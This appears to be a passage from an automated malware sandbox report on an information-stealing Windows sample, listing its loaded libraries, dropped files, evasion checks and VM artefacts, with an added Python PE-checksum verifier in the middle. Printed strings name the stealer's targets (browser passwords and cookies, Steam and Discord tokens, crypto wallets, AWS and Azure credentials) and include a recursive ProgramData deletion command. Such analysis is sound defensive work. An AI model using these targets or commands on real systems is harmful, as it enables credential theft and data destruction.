Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Google Drive.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 25xTHcaF7V.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: Surrey.com, 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram 
Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: cryptosetup.pdbGCTL source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, i5pz5p.13.dr
Source: Binary string: cryptosetup.pdb source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, i5pz5p.13.dr
Source: Binary string: 1.pdb\ source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 1.pdb source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: {"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram 
Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWAR
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: 25xTHcaF7V.exe Static PE information: real checksum: 0xd7c72 should be: 0xde362
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960DE6 push ecx; ret 13_2_00960DF9
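The static finding "real checksum: 0xd7c72 should be: 0xde362" means the value stored in IMAGE_OPTIONAL_HEADER.CheckSum does not match the one computed over the file. The loader only enforces the field for drivers and a few system images, so a mismatch never stops a user-mode binary from running, but it is a cheap triage signal: a linker writes a correct value, and a mismatch usually means the file was packed, patched or appended to after linking. The Python below is an added example, not code from the report; it implements the well-known fold-and-add algorithm that pefile's generate_checksum reproduces (a 32-bit carry-folding sum over the whole file with the CheckSum field skipped, folded to 16 bits, plus the file length) and exposes the same "stored versus computed" comparison the report prints. The image it checks is a constructed header-only blob, not the analysed sample.

```python
import struct

def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum; raises ValueError if not PE-shaped."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    # Signature (4) + IMAGE_FILE_HEADER (20) + CheckSum's offset inside the
    # optional header (64, the same for PE32 and PE32+).
    return e_lfanew + 4 + 20 + 64

def pe_checksum(data: bytes) -> int:
    """Expected CheckSum: carry-folding 32-bit sum over the file with the CheckSum
    dword itself skipped, folded to 16 bits, plus the file size."""
    skip_dword = checksum_field_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)   # algorithm works on whole dwords
    total = 0
    for i in range(len(padded) // 4):
        if i == skip_dword:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def verify_pe_checksum(data: bytes):
    """Return (stored, computed, matches), the comparison behind the report's
    'real checksum ... should be ...' line."""
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = pe_checksum(data)
    return stored, computed, stored == computed

def patch_pe_checksum(data: bytes) -> bytes:
    """Copy of the image with a correct CheckSum written into the header."""
    out = bytearray(data)
    struct.pack_into("<I", out, checksum_field_offset(data), pe_checksum(data))
    return bytes(out)

def build_sample_image(size: int = 0x400) -> bytes:
    """Constructed, non-loadable PE-shaped blob with just enough header to locate
    CheckSum; it stands in for a real file and is not taken from the report."""
    img = bytearray((i * 37 + 11) & 0xFF for i in range(size))  # filler "code"
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)          # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", img, 0x80 + 24, 0x10B)    # optional header magic: PE32
    struct.pack_into("<I", img, checksum_field_offset(bytes(img)), 0)  # unset, as in a stripped build
    return bytes(img)

if __name__ == "__main__":
    sample = build_sample_image()
    print("unset  :", verify_pe_checksum(sample))
    print("patched:", verify_pe_checksum(patch_pe_checksum(sample)))
```

Because the field is skipped during the sum, writing the correct value does not change what is computed, so patch_pe_checksum followed by verify_pe_checksum always agrees; any later byte change elsewhere in the file breaks the match, which is exactly what a packer or a post-build patch does to a binary whose author did not re-run the checksum step.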

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File created: C:\ProgramData\9r1vs\i5pz5p
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File created: C:\ProgramData\9r1vs\i5pz5p
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File created: C:\ProgramData\9r1vs\i5pz5p

Boot Survival

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 13_2_009D26DD
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0095FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 13_2_0095FC7C
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Dropped PE file which has not been started: C:\ProgramData\9r1vs\i5pz5p
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com API coverage: 3.7 %
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 13_2_009ADC54
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 13_2_009BA087
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 13_2_009BA1E2
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 13_2_009AE472
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 13_2_009BA570
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B66DC FindFirstFileW,FindNextFileW,FindClose, 13_2_009B66DC
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097C622 FindFirstFileExW, 13_2_0097C622
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 13_2_009B73D4
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B7333 FindFirstFileW,FindClose, 13_2_009B7333
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 13_2_009AD921
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00945FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 13_2_00945FC8
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\634977
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\634977\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: Web Data.26.dr Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: chrome.exe, 00000013.00000002.2818774004.0000203400B04000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: outlook.office.comVMware20,11696508427s
Source: Web Data.26.dr Binary or memory string: discord.comVMware20,11696508427f
Source: Web Data.26.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: Web Data.26.dr Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: Web Data.26.dr Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: chrome.exe, 00000013.00000002.2823694505.0000203400F54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mousery
Source: chrome.exe, 00000013.00000002.2813940092.0000203400290000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=cde3eea9-2317-48e2-99d7-7e8d0326b177
Source: Web Data.26.dr Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: chrome.exe, 00000013.00000002.2809981784.0000027B6E610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: Web Data.26.dr Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Web Data.26.dr Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
Source: msedge.exe, 00000018.00000003.2870259455.00004D9402538000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
